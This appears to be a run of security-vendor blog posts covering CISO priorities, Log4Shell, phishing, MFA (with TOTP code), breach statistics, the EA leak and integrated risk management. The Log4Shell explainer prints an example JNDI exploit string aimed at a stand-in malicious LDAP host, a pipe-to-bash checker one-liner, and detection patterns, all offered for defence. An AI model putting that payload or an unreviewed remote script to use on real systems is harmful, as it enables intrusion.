Cyber security decision-makers are currently shaping a vision to support enterprise resiliency. A sizeable number of CISOs described the initiatives their enterprises plan to take on in the coming months, concentrating not on particular tools but on the approach, and focusing on people, processes and technologies. They also say their priorities reflect security requirements arising from recent shifts in their organization’s IT and business environment, a changing threat landscape, and emerging risks. In short, CISOs say their priorities for the coming year are all about keeping pace, and getting better.

Changing Landscape


More is moving to the cloud, and IT is decoupling applications from the data layer. CIOs are moving to more composable architectures while accelerating their digital enterprise.

We have now been on this work-from-home journey for two years, so the perimeter is wherever workers choose to work, and this state of flux will only continue.



At the same time, CISOs need to be working on their own staff, too. The Great Resignation is real, and it is particularly acute in security. People are leaving security because they are burned out. That is going to be even harder to manage in the coming years. The question now for CISOs is how to manage all of that: how do they run smart, so that secure and fast are both attainable?


Darrell Keeling, vice president of information security and HIPAA security officer for Parkview Health, has some ideas. Like other security chiefs, Keeling has seen the threat landscape evolve during his tenure.


For example, he has seen attackers increasingly target healthcare institutions with ransomware. At the same time, organizations, including his own, have become more digital, with growing cloud environments, moves that have greatly expanded the attack surface and virtually eliminated the idea of a perimeter.


Keeling says his priority is to evolve security to match both the changing technology stack and the threats coming at it.


He says that involves simplifying his security stack, moving from a large collection of best-of-breed products from multiple vendors to one relying heavily on Microsoft security products. (Parkview Health IT is predominantly a Microsoft shop using the Azure cloud.) He says simplifying the security stack will produce more efficient and effective security operations, with easier integrations and lower added costs.


As part of that move, Keeling plans to focus on staff training to get more of his team Microsoft certified.


Other 2022 priorities for Keeling include implementing more threat intelligence, data analytics software, and cloud security technologies; building a threat monitoring capability; and shoring up his third-party risk management program.


Technologies Prioritised



Case in point: cloud data protection technologies are one of the priorities, with a large number of CISOs either studying, piloting, using or upgrading their use of them.


In another finding, a sizeable number of CISOs are prioritizing cloud-based cybersecurity services. Data access governance technologies also top the CISO priority list, as does zero trust. Behaviour monitoring and analysis is another big priority. CISOs also indicated high interest in or use of security orchestration, automation, and response (SOAR) technologies, with many CISOs either studying, piloting, using, or upgrading their use.


“The cloud is really the centerpiece of security,” says Andrew Plato, CEO of the consulting firm Zenaciti and a cybersecurity analyst with The Analyst Syndicate. (He notes that he sees CISOs particularly interested in cloud security posture management platforms that give them a holistic view and enable security across their multiple cloud deployments.)


Kevin F. Brown’s priorities for the coming year are representative of similar trends. Brown, senior vice president and CISO for Science Applications International Corp. (SAIC), said his top priorities are talent recruitment and retention; business continuity and resiliency; zero trust for network, cloud, and data; and business enablement.


“Cybersecurity talent continues to be in high demand and short supply, particularly in building diverse and inclusive teams, which is essential. Ransomware continues to be a top threat across industry, both from a denial-of-business impact and also from an increasing data exfiltration aspect. Apart from protection capabilities, resiliency and recovery plans need to be in place,” he explains.


He continues: “Zero trust principles need to be in place not only for traditional network security but also as a strategy for the ever-expanding perimeter of on-prem and cloud in particular, as well as the protection and integrity of critical data. While perhaps a bit all-encompassing, enabling the business is a top priority, whether it be through providing secure business solutions, mitigating risks, promoting security-by-design concepts, etc.”


This reflects the overall state of cybersecurity programs for CISOs, Plato says, noting that 2022 will be about advancement, not revolution. “Will there be some cool tech that revolutionises everything? Probably not. But the pieces to do all that (CISOs must) are already there,” he adds. Shawn M. Bowen, vice president of information security for World Fuel Services, says his overarching goal is the continuous improvement of the security function, a goal that is driving his work for the coming year.


For example, he is working to sharpen his ability to design security programs, procedures, and controls tailored to his company’s own identified risks.


“I want to evolve beyond a framework maturity model to being a risk-based security organization,” he says. “So rather than building security off a framework and providing standard services, our goal is to focus on our enterprise risk management program.” To that end, he is working with his business partners to understand, articulate, and prioritize the threats and risks within their particular functional areas so that security can truly align its resources to defend against them.


Security for Enterprise Architecture by ZERON: https://zeron.one/portfolio/security-for-enterprise-architecture/


Likewise, Bowen wants to get the business more engaged in security’s enterprise risk management approach. He plans to use that engagement to develop applicable threat modeling for each of their products and services so he can tailor security offerings to those specific risks. He also wants to create ways to measure progress based on how well security improves its performance in delivering services in those areas.



Further Challenges


CISOs indicate that they face plenty of challenges in achieving their objectives in the year ahead. According to a number of studies, CISOs said that the top reason for their organization falling short in addressing cyber risk is difficulty persuading all or parts of their organization about the severity of the risks they face. Quite a few indicated that this is an issue. Nearly as many indicated that inadequate resources are at play, while many cited the inability to be adequately proactive in their security strategy. Other top reasons for falling short in addressing cyber risk include struggles in recruiting and retaining professional expertise; failing to consistently address security requirements during application development; and inadequate security training for users.


Although acknowledging those as significant challenges, analysts point out that many of the CISO priorities will help them push back on these very issues. They note, for instance, that focusing on incident response, particularly when tailored to business risks and combined with business enablement and resiliency, engenders more business support for security initiatives. Meanwhile, adding more data protection technologies, cloud security tools, and solutions supporting zero trust and SOAR helps embed security into more of the core technology stack, rather than making it a bolt-on service. And CISOs who add orchestration capabilities as part of those technology deployments help ease the challenges that come from having too few security staff and the occasional user-side security slip-up.


Our team at ZERON has been working on reducing the hassle of security monitoring that is prevalent in the industry. With better visualization, and orchestration where necessary, a lot of undue effort can be removed, reducing the dependency on manual labor and applying human judgement where it is actually needed. There is also a need for better handling of security KPIs, properly mapped across sectors and correlated with the people, process, and technology aspects of security. Finally, security is 90% deliberation and 10% perspiration, and it is the deliberation that proper visualization, analysis, and reporting support, which is where we at ZERON focus; once the deliberation is nailed, the perspiration is easier to take care of.

Log4j is a term that has created a massive buzz in the IT industry over the last few days, with a zero-day vulnerability disclosed this month. But what does it mean, and how can ZERON help with its management and mitigation?

What is Log4j?

 
“The flaw in the Log4j software could allow hackers unauthorised access to computer systems. Millions of devices are affected.”
A zero-day is a vulnerability in a software package that becomes publicly known, or is exploited, before the vendor has had time to release a fix: the vendor has known about it for “zero days”. The flaw has usually been present for a long time before anyone noticed. This flaw in Log4j was publicly disclosed on 9 December 2021 and fixed in Log4j 2.15.0, released on 10 December 2021, which means any system running a vulnerable version is exposed to attackers until it is patched. The reason for the buzz is that Log4j is embedded in millions of devices and applications, all of which are potentially exposed. Log4j 2 versions from 2.0-beta9 up to and including 2.14.1 are vulnerable (Log4j 1.x does not have the JNDI lookup and is not affected by this CVE, though it is end of life), so the bug had existed for years, and there may have been groups quietly using it for a long time without anyone knowing. A fix was released, but whether that fix has actually been applied to every vulnerable system is an entirely different story. The vulnerability is tracked as “CVE-2021-44228”.

CVE-2021-44228

 
The vulnerability first appeared on Twitter on 9 December 2021, with reports of zero-day exploitation of a flaw in a popular Java logging framework, Log4j. The core of the problem is that when specially crafted text is logged, Log4j interprets it as a lookup expression instead of just logging it: a ${jndi:...} lookup makes the logger fetch and load an object from an attacker-controlled server. This leads to RCE (Remote Code Execution), compromising any system using this software. The vulnerability has been named “Log4Shell” and received the highest possible CVSS severity rating of 10.0. Log4j is usually bundled as a component inside other software, which exploded the number of vulnerable devices and made patch distribution far harder. After the initial public disclosure, detection and exploitation tools appeared within hours.

Analysis

 
Log4Shell has very high attacker value and a very high exploitability score, which means the exploit is easy to weaponise and it is highly likely that attackers will use it. It has also been reported as exploited in the wild. The vulnerable library is common in enterprise systems, and affected software is vulnerable in its default configuration, which makes it far worse. The vulnerability has been categorised as CWE-917 (Expression Language Injection), CWE-502 (Deserialisation of Untrusted Data), CWE-400 (Uncontrolled Resource Consumption) and CWE-20 (Improper Input Validation). The basic exploit string can be as simple as ${jndi:ldap://malicious-ldap-server.com/a}, placed in any input that ends up being logged, such as a User-Agent header, a username field or a search query.

Detection

 
To check whether a vulnerable version of Log4j is installed on a system, one publicly available checker can be run with a one-liner in the terminal (as with any script piped from the internet straight into a shell, download and read it first, and run it only where you accept that risk):
wget https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/log4j_checker_beta.sh -q -O - |bash
There are a few ways to detect whether this vulnerability is being exploited on your system:
  • Review web server and application logs for `${jndi:ldap`, `${jndi:rmi`, `${jndi:dns` and the other JNDI schemes (`ldaps`, `iiop`, `corba`, `nis`). These are the lookup strings that cause the logger to resolve and load the URL that follows them. Attackers obfuscate them with nested lookups such as `${${lower:j}ndi:...}` or `${${::-j}ndi:...}`, so a plain search for `jndi` misses many attempts; normalise the nested lookups before matching.
  • Scan /var/log with YARA signatures matching these indicators.
  • Scan the web server for generic webshells.
  • If you have EDR on the web server, monitor for suspicious curl, wget, or related commands spawned by the Java process, and for unexpected outbound LDAP (389/636), RMI (1099) or DNS connections from it.
  • If you have ZERON installed, it detects the vulnerability for you automatically, without the manual work above.

Mitigation

 
The simplest mitigation is to update Log4j. Version 2.15.0 was the first fixed release, but it was later found to be incomplete (CVE-2021-45046), so the recommended target is 2.17.1 or later for Java 8 (2.12.4 for Java 7 and 2.3.2 for Java 6). If updating is not possible, setting the system property “log4j2.formatMsgNoLookups” to “true” (available from 2.10) reduces exposure, but it too was shown to be bypassable in some configurations, so the reliable workaround is to remove the JndiLookup class from the classpath, for example with: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. On Java runtimes 8u121 or later, com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase default to false (com.sun.jndi.ldap.object.trustURLCodebase from 8u191), which blocks loading remote classes over JNDI. This limits but does not remove the risk: an attacker can still return a serialized object that is deserialised using gadget classes already on the local classpath, and can still exfiltrate data such as environment variables through the lookup itself. A quick scan with ZERON will give you a more detailed review and mitigation tactics for your system in a user-friendly form.
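The following is an added example of the class-removal workaround and the version check, written for this page rather than taken from Apache or the original post. It builds a stand-in jar containing a placeholder JndiLookup.class entry (constructed bytes, not real bytecode), strips that entry the way the zip -d command above does, and classifies log4j-core version strings against the fixed release of each Java line.

```python
import os
import re
import shutil
import tempfile
import zipfile

# Path of the class inside log4j-core that performs the JNDI lookup.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d+))?")
_JAR_NAME_RE = re.compile(r"log4j-core-(\d+\.\d+(?:\.\d+)?(?:-[A-Za-z0-9]+)?)\.jar$")


def parse_version(version: str):
    """Split '2.14.1' or '2.0-beta9' into (major, minor, patch, tag, tagnum)."""
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {version!r}")
    major, minor, patch, tag, tagnum = m.groups()
    return int(major), int(minor), int(patch or 0), (tag or "").lower(), int(tagnum or 0)


def needs_update(version: str) -> bool:
    """True if this log4j-core version still needs upgrading for Log4Shell.

    Fixed releases per Java line: 2.3.2 (Java 6), 2.12.4 (Java 7), 2.17.1 (Java 8+).
    """
    major, minor, patch, tag, tagnum = parse_version(version)
    if major != 2:
        return False          # Log4j 1.x has no JNDI lookup (but is end of life)
    if minor == 0 and tag == "beta" and tagnum < 9:
        return False          # the JNDI lookup was introduced in 2.0-beta9
    if minor == 3:
        return patch < 2
    if minor == 12:
        return patch < 4
    return (minor, patch) < (17, 1)


def version_from_jar_name(path: str):
    """Extract the version from a file name like log4j-core-2.14.1.jar."""
    m = _JAR_NAME_RE.search(os.path.basename(path))
    return m.group(1) if m else None


def has_jndi_lookup(jar_path: str) -> bool:
    with zipfile.ZipFile(jar_path) as z:
        return JNDI_CLASS in z.namelist()


def strip_jndi_lookup(jar_path: str, out_path: str) -> bool:
    """Copy jar_path to out_path without JndiLookup.class; True if it was removed."""
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(out_path, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(info, src.read(info))   # keeps each entry's own compression
    return removed


def build_fake_log4j_core(path: str, version: str = "2.14.1") -> str:
    """Constructed stand-in for log4j-core: placeholder bytes, not real classes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF",
                   f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo() -> dict:
    """Build the stand-in jar, strip it, and report the before/after state."""
    workdir = tempfile.mkdtemp()
    try:
        jar = build_fake_log4j_core(os.path.join(workdir, "log4j-core-2.14.1.jar"))
        stripped = os.path.join(workdir, "log4j-core-2.14.1-nojndi.jar")
        removed = strip_jndi_lookup(jar, stripped)
        return {
            "version": version_from_jar_name(jar),
            "needs_update": needs_update(version_from_jar_name(jar)),
            "before": has_jndi_lookup(jar),
            "removed": removed,
            "after": has_jndi_lookup(stripped),
        }
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    print(demo())
```

The version check is by design conservative: 2.15.0 and 2.16.0 are reported as still needing an update, because the later CVEs were fixed only in 2.17.x. In a real environment the jar name is not always reliable (shaded or renamed jars are common), so the class-presence check is the one to trust.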

The world of deception has taken a turn for the worse as the population moves into the cyber realm, in an era where work from home, remote processes and social media are a major part of the lives of millions, if not billions. Harvesting statistical data, stealing credentials, targeting advertisements at your profile, and in the worst cases injecting something malicious into your system: phishing has been a hot topic, yet many dismiss it as overhyped awareness. Is that too hasty a conclusion? Well, reports of 65% of people falling prey to it say a lot.

Phishing scams usually impersonate a trusted entity via email to lure you into clicking malicious links or content that redirects you to an exact replica of a website you know and blindly trust. “Well hey, I know this,” the victim thinks, enters his or her credentials, and they are gone in seconds. Phishing also comes in other mediums, such as SMS phishing (smishing) and voice phishing (vishing), and new variants will keep appearing, all with the same motive: to get hold of your details.


What happens if I do?

Clicking such a link can have a range of effects on your system, depending on the adversary’s intent. Often the aim is harvesting credentials in order to impersonate you on a social media platform, an email account or any website where you have a user identity. The victim might also be compromised by malware planted on the phone or computer: ransomware that encrypts all data and releases it only after a paid ransom, a backdoor for persistent access, or a foothold from which the attacker escalates into networks you are connected to.

In every case the adversary has one common intent: to compromise data in one form or another, to be used for their benefit or sold for money.

Clicked on it! What Next

The general hygiene to keep yourself safe if you come across and accidentally click on such a link is to disconnect your device from the internet immediately: unplug the cable in the case of an Ethernet connection, or disconnect the machine or mobile from the home Wi-Fi network.

Following this step, the best practice is to quickly take a backup of any files on your system that are not continuously backed up by a cloud backup service, in case the malicious content that may have been delivered to your system starts running and alters them. Usually a blank hard drive is the best option for the backup, with no other files on it that could be tampered with as well.

A system scan with a basic antivirus or Defender can be run to check for malware and any potentially installed services, followed by changing the credentials of the accounts that may have been compromised and that matter most to you (do this from a different device you know to be clean). Social media and email accounts are generally targeted the most.

Once you are done, raise a fraud alert and file a report so that the website, link or sender is flagged as fraudulent and others are kept safe.

Checking the link in the URL bar, verifying the source, and making sure that the King of Nigeria does not really want to send you a million dollars from his royal lottery in exchange for your details on a given link: a little awareness goes a long way.

What if your computer falls into the wrong hands while you are away, and your phone suddenly chimes with a notification saying there has been an attempt to log in to your precious social media profile, or even an important cloud admin panel? Well, that was a saviour, wasn’t it? All thanks to two-factor authentication, also known as multi-factor authentication, or if those are a mouthful, simply MFA.

Two-factor authentication adds an extra layer of login security to major applications, from Facebook, Twitter and Instagram to Gmail, the AWS console, Superset and many more. And it is not only about SMS codes: the second factor can be a temporary code delivered to a device in your possession, a second email address, a code generator app linked to the account, a phone call, or a physical hardware token.


Is it Important?

 

Maintaining authenticator apps, receiving and typing in codes, and squinting at small letters to fill in captcha requests can feel like a nuisance, but they are a remarkable front line against the horrors of modern breaches.

Consider the massive breaches recorded not in distant history but in the recent past, with millions and billions of user credentials out in the wild, being traded from one hand to another as we speak. The compromised accounts would otherwise be logged into and used as a stepping stone into personal profiles; that is exactly what our heroes of the day curb.

Guessing a short, predictable password, or running scripts against login fields to brute-force passwords, is how a large-scale data breach most easily turns into control of your account. Or attackers lure you into phishing websites and spear-phishing traps, or check whether you reused a password across multiple platforms. Sounds ridiculous? Who would do that in their right mind? Well, more than 44% of people is the answer.

Well, good thing that the small ping on your mobile phone about a login attempt made you change your password and log out of all other devices in time.

Is this magic?

Different MFA methods use different mechanisms, but the general rule is an authentication server responsible for issuing and verifying such codes once the username and password have matched the user database.
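As an added example, not from the original post, here is how the authenticator-app variety of code generation and verification works: TOTP (RFC 6238) derives a code from a shared secret and the current 30-second time step, and the server accepts a code only once and only within a small window around its own clock. The secret and expected codes are the RFC 6238 test vectors; the verification function and its replay rule are this example’s own design.

```python
import base64
import hashlib
import hmac
import struct
import time

# RFC 6238 reference secret (ASCII "12345678901234567890"), in the base32 form
# a user would receive in a provisioning QR code.
DEMO_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def decode_secret(b32: str) -> bytes:
    """Decode a base32 secret as shown in a provisioning URI / QR code."""
    raw = b32.strip().upper()
    return base64.b32decode(raw + "=" * (-len(raw) % 8))


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step). This is what the
    authenticator app on the phone computes."""
    return hotp(secret, int(at // step), digits)


def verify_totp(secret: bytes, code: str, now: float, last_counter: int,
                window: int = 1, step: int = 30, digits: int = 6):
    """Server-side check, run only after the password has already matched.

    Accepts the code if it matches the current time step or one within
    `window` steps either side (clock skew), and only if that step is newer
    than `last_counter`, so a code captured by a phisher cannot be replayed.
    Returns (accepted, new_last_counter); the caller persists the counter.
    """
    current = int(now // step)
    for offset in range(-window, window + 1):
        counter = current + offset
        if counter <= last_counter:
            continue
        if hmac.compare_digest(hotp(secret, counter, digits), str(code)):
            return True, counter
    return False, last_counter


if __name__ == "__main__":
    secret = decode_secret(DEMO_SECRET_B32)
    print("current code:", totp(secret, time.time()))
```

Two details matter in practice: the comparison is constant-time (hmac.compare_digest), and the accepted counter is stored so the same code is refused a second time, which is what stops the “enter your code here” phishing page from reusing it within the same 30 seconds.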

In a fast-paced world, a dynamic approach to web and application security, tailored to the requirement at hand instead of relying loosely on passwords alone, is the way forward. Sometimes, a little hold on time is a good thing.

Looking back through the times when it was tough to explain the need for cybersecurity to an organization brings up a number of chapters that proved everyone wrong. Holding a back seat on the list of priorities produces compromises that escalate faster than a random Elon Musk tweet.

Cybercrime is predicted to inflict nearly 6 trillion USD in damage globally this year, with costs growing by 15% per year and reaching an annual loss of 10.5 trillion USD by the end of 2025, up from the recorded 3 trillion USD in 2015. Ransomware, spyware, trojans, social engineering attacks, all of them coming fast, faster than you expect.


Let’s go by some recorded numbers, shall we? The estimated loss of revenue in India alone was recorded at 1.25 lakh crore rupees in 2019, with ransomware attacks increasing every day and the curve growing exponentially under the current work-from-home scenario.

With about 52% of domestic companies based in India having fallen victim to a cyber attack of minor or major severity, studies show cybersecurity budgets at a standstill and the level of damage underestimated, even though incidents are on the rise. With 71% of victims reporting a serious breach and 65% facing nearly a week of downtime, reputation, brand value and market trust come down with each missed configuration.


Let us look at recent incidents that show what happens when security sits loosely on the priority list. The security flaw that leaked millions of PII records of Indian citizens, along with Covid-19 test results, from a website run by the Government of West Bengal followed the path of a preceding data leak of similar origin at a large Indian diagnostics firm, Dr. Lal PathLabs. Unprotected servers and development flaws will continue to make headlines as long as secure systems take a back seat.

You don’t want your friends to know your examination results, right? But what if someone displays them to the entire world? Wait, not only yours, but those of nearly 190,000 other aspirants just like you! The results of the 2020 Common Admission Test, along with personal data including names, dates of birth, email IDs, mobile numbers and previous results, were made available on a cybercrime forum.

Let’s take a step back and assume you performed well and need to celebrate with a slice of cheesy pizza! Wait, a data breach in a puny little pizza order as well? The massive data breach at Domino’s leaked PII, payment card data and other details onto the dark web for the world to view, as if the dark web wasn’t scary enough in the first place.

Come forth, security; let’s flatten the curve of rising threats by taking a step back and thinking about securing ourselves first. So, when do you start thinking? Zeron offers an all-round solution to help secure an organization against endpoint vulnerabilities with the utmost scrutiny, customizable and scalable to the size of any organization.


In a major cyber security event, after a failed extortion attempt, hackers have leaked online a massive 751 GB cache of data they previously stole from Electronic Arts. The files include the source code of the popular FIFA 21 game. The hackers had expected a large sum of money from EA given the game’s massive popularity, but EA refused to budge, which resulted in the leak.

The criminals also tried to sell the FIFA 21 source code online, but that too came to nothing as there were no takers. In the end, they dumped the whole thing on torrent sites. Now anyone could set up private servers to play the game with friends, though this is strongly inadvisable. Beyond the piracy aspect, the hackers may also have embedded malware, ransomware or similar within the code, with the opportunity to spread to large numbers of people. Although EA officials have said the hackers could not access player data, it remains to be seen how much of that holds up.

In an interview a couple of months back, one of the cybercriminals revealed that they had purchased stolen authentication cookies for an EA internal Slack channel for $10 on a dark web marketplace called Genesis. The cookies were used to impersonate the account of an EA employee, giving them access to the company’s Slack. The hackers then applied a bit of social engineering, tricking IT support staff into granting them access to the company’s internal code repositories.

Such security breaches are a major wake-up call for organisations to improve their security posture in an ever-changing threat landscape. There is no alternative to “Zero Trust” in this day and age. Security needs to be smarter, more scalable and, most importantly, built on a “Zero Trust Architecture”.

Integrated risk management (IRM) is a set of practices and processes supported by a risk aware culture and enabling technologies, that improves decision making and performance through an integrated view of how well an organization manages its unique set of risks. 

Under the Gartner definition, IRM has certain attributes: 

    • Strategy: Enablement and implementation of a framework, including performance  improvement through effective governance and risk ownership 
    • Assessment: Identification, evaluation and prioritization of risks 
    • Response: Identification and implementation of mechanisms to mitigate risk 
    • Communication and reporting: Provision of the best or most appropriate means to track and inform stakeholders of an enterprise’s risk response 
    • Monitoring: Identification and implementation of processes that methodically track  governance objectives, risk ownership/accountability, compliance with policies and  decisions that are set through the governance process, risks to those objectives, and  the effectiveness of risk mitigation and controls 
    • Technology: Design and implementation of an IRM solution (IRMS) architecture 

Integrated risk management is the combined activities of corporate governance, digital and cyber risk management, and cybersecurity-based compliance integrated into a holistic approach that enables a streamlined program, enhanced enterprise-wide visibility into the cyber posture, and meaningful automation to augment teams’ abilities and insights. 

The needs of businesses today are changing. Where before the siloed approach of  Governance Risk and Compliance teams operating almost independently was sufficient, this rapid increase in technology adoption has shifted the needs of information security teams and the businesses they serve. 

Many forces caused the next iteration of security, privacy, and risk management to emerge:  the integration of technology into business-side teams made digital risks ubiquitous across the organization, not just within technical teams. With breaches such as Equifax, Marriott,  and Capital One, CEOs and Boards have seen how information security can have direct impacts on the bottom line. As the scope of IT risk assessment has expanded to include the entire business, information security leaders can no longer operate in modular and siloed teams.

Management

Traditional Approach to Risk Management 

Risk management has traditionally targeted operational or managerial risks in a number of functions, particularly finance, health and safety, fire, security, communications, and insurance. Those functions tend to operate independently inside silos, in an uncoordinated and unsystematic manner. Senior managers came to recognise that continuing to run in functional silos resulted in inefficient overlaps (and probably serious gaps) in the overall risk management strategy. It also meant that no one could offer the board a holistic assessment of the organization’s prioritized risk profile. 

The Downfall of Traditional Risk Management 

Faced with the pandemic’s fast-moving, interconnected risks, organizations everywhere were left scrambling to deal with operational and financial difficulties they never contemplated, let alone planned or practiced for. If you don’t have all the facts, the action becomes nothing more than a shot in the dark. 

The crisis may have sounded the alarm, but the glaring weaknesses revealed in the way risk and compliance are traditionally managed will not magically disappear when the coronavirus eventually runs its course. Even outside of crisis, today’s risk landscape is more crowded and uncertain than ever – and virtually every risk is gaining in velocity and ferocity.  It’s difficult, if not impossible, to assess your true exposure with the fragmented view provided by old-school risk management techniques. 

How can integrated risk management help my business?

As existing risks become more complex and new risks continue to emerge, companies need strong integrated risk management programs. Not having a clear understanding of risks and their potential effects can impede an organization’s decision-making, and harm its business performance. Organizations taking an integrated approach to managing risk will also achieve consistent risk management outcomes. 

Many companies are adopting an integrated approach to risk management, enabling executives to coordinate and unify risk management activities throughout the enterprise.  Integrated risk management gives organizations a better understanding of their risks and helps support informed risk-based decision-making. 

The Rise of Integrated Risk management 

Our always-connected world demands a similarly connected approach to risk management.  To survive in a world dominated by social media, mobile devices, and relentless scrutiny by everyone inside and outside the organization, senior leaders need to rely on an increasing number of stakeholders to identify, manage, and reduce risk together. 

Stakeholders across the organization need to be able to freely exchange data and ideas to proactively address accelerated and amplified risks. All that intelligence needs to be available in real time to top decision-makers, who must continually make hard strategic choices to drive organizational success, and that takes an integrated approach to risk management. 

Integrated risk management brings into focus anything that could harm your organization,  its competitive position, reputation, or strategic growth. It connects the dots between every risk – insurable and non-insurable, strategic and operational – so you can understand what you’re facing, how everything interrelates, and the cumulative impact on the organization. 

Comparison

IRM v/s GRC v/s ERM 

According to Reciprocity consultant Gerard Scheitlin, founder and president of risk management company RISQ Management, there is no difference between IRM, ERM, and GRC. All three terms refer to enterprise-wide, integrated risk management: a program that encompasses cybersecurity, finance, human resources, audit, privacy, compliance, and natural disasters. 

ERM is centered around the strategic planning, organizing, leading, and controlling of a  company’s risk activities. That is, an organization examines its strategic business objectives,  then reviews the information technology risks associated with them, to assure business continuity. 

IRM, meanwhile, focuses specifically on analyzing the risks inherent in an organization’s technologies. Integrated risk management incorporates many elements of enterprise risk management, but it’s typically more focused on IT functionality. According to business research and advisory company Gartner, IRM involves the hands-on work that makes ERM  possible: the technical controls critical to effective cybersecurity such as security monitoring, network monitoring, and perimeter protection. 

Both IRM and ERM provide a holistic model of risk management, including IT risk and operational risk, and are integrally related. You can’t have one without the other: IRM feeds ERM, and ERM guides IRM.

The idea of Governance, Risk and Compliance (GRC) is not new to the information security industry. For years, GRC approaches and solutions have enabled organizations to operate cybersecurity teams for all three of those functions (corporate governance, IT risk, and industry and geographic compliance). The triggers that have caused the shift away from a siloed approach have also caused information security leaders to seek out integrated risk management as a means to align their entire information security organization to deliver on these new expectations.

Towards More Integration 

The techniques of risk identification, evaluation, analysis, and control are equally applicable to all risk management functions, whether operational or financial, because the methodology behind them is the same.

Though some specialist knowledge will be required, an integrated approach essentially requires good planning, teamwork, and communication: sharing ideas and technical knowledge. The diversity inherent in an arrangement where professionals from different backgrounds and disciplines interact and challenge assumptions can often lead to striking insights and alternative approaches. Indeed, it is often the individuals with the least experience in an area who ask the most insightful questions, having no long-held assumptions about what can and cannot be asked.

How to implement Integrated Risk Management?

There are four pillars to implementing an integrated risk management program:

Aligning your cyber strategy with business outcomes: The new role of the CISO is to act as a bridge between technical cybersecurity teams and business-side stakeholders and executive management. The critical step is to ensure that you align your cyber strategy and tactics with the business outcomes that executive management is seeking to achieve. Start by asking yourself which identified risks you are investing the most time and effort in mitigating. What disruptions would those risks cause if left unaddressed? Is your company enabling technologies that improve performance through an integrated view of risk?

Sharing your knowledge helps the entire organization recognize that security is now an organization-wide effort that everyone must be aware of and participate in. This shift also allows non-technical business leaders to make more informed strategic decisions for their respective business units within the context of digital risk and the unique set of risks they may face. 

Facilitating a risk-aware, risk-engaged culture: Any goal of shifting an organizational culture can appear daunting, but with the right amount of patience and the correct approach, it is possible. As a CISO, it is critical to ensure that you have buy-in from allies and colleagues within the C-suite to support your effort to shift the culture. In the experience of CyberSaint’s partners, these positions have proven to be the right first alliances. In one of their case studies, they worked with a Fortune 100 entertainment company, and their point of contact was the Director of IT. The IT Director knew that they needed to increase risk awareness across the organization and began soliciting buy-in from the CIO and the COO. The reason for this choice was that, with the CIO’s technical understanding and the COO’s ownership of the employee development process, these two would be the IT Director’s best evangelists as the program grew. The results were stunning. Once the IT Director, CIO, and COO had established the needs and goals, they began expanding in concentric circles – going from three to 15 to 100 and so on until they had altered the company culture.

A culture change of any kind is daunting – it is a journey that requires patience, diligence, and constant vigilance to ensure that the new ideas remain and scale with the organization. For CISOs working to increase cyber risk awareness at their organization, stating that you are going to change the culture is like saying you are going to change the direction of a river – it is possible, but you have to start small. Start with the critical stakeholders who will facilitate the change with you, and be prepared to evangelize.

Integrating risk into business strategy discussions: CISOs implementing an IRM program must see the give and take between business growth and security. Any strategic decision or new business growth shifts the risk landscape and could impact the business. In today’s business world, the assumption is that new business growth is in some way related to technology and as such increases the digital risk profile of the organization.

Effective risk management activities result in secure growth for the business. Too many CISOs, however, see any residual risk as a failure to do their job. A risk-aware culture, by contrast, enables the organization to clearly convey the decisions about which risks to address, and why a given set of practices exists. This transparency is imperative to ensure that the whole organization knows where it stands on risk management activities.

Effectively reporting on a risk-based approach: If it’s not measured, it’s not managed. Shifting from a checklist, compliance-based approach to integrated risk management will change the way your security organization reports on its success. An integral value of an integrated approach to risk and compliance is the powerful insight that leaders can glean from all of that information being in one place. Where cybersecurity organizations would previously have to spend weeks or months generating reports from scores of spreadsheets and risk registers, an integrated approach and an IRM program not only deliver better stories and insights but also automate much of the reporting process.

Accepting Responsibilities 

Whatever the job description, risk management in all its forms is always everyone’s responsibility, not just that of specialists who have the term in their job title. The simple reason for this is that for every major incident there will be thousands of smaller incidents that collectively present significant avoidable costs to organizations, and which offer clear warning indicators of issues that need to be addressed before a major incident occurs. Major incidents are commonly accepted to be the tip of the iceberg, and if organizations wish to reduce the frequency and severity of accidents they need to address the underlying causes of such incidents by learning from previous, preferably lesser, events.

To really address the issue of incident prevention, the first steps are to identify, evaluate and control threats. To be effective, this needs to be a team effort involving the entire organization, with everyone taking responsibility for initiating and implementing opportunities for organizational learning. The first step in this is to increase risk awareness and alter the organization’s risk cognition. This is best done through regular communication activities and, most importantly, extensive training, so that each employee understands their risk management roles and responsibilities as well as how they are to implement key risk controls.

The key to getting employees to support risk control measures is to build an awareness of how a threat to the business is also a threat to each employee’s job security, threatening as it does the very existence of the organization. For example, tolerating colleagues smoking in unauthorized places could cause a fire that would effectively destroy the business. A lack of vigilance within the company premises can encourage petty theft and perhaps lead to more serious crimes or a steady fall in company morale. However, to be responsive to such risks, employees need to be aware of them and understand how to control them and how to implement such measures. This requires training and good internal communications. Unfortunately, in the industries that I have had experience with, many employees still perceive such risk management activities as ‘somebody else’s job’.

The Benefits of IRM 

A well-integrated risk management solution can bring a number of benefits, including:

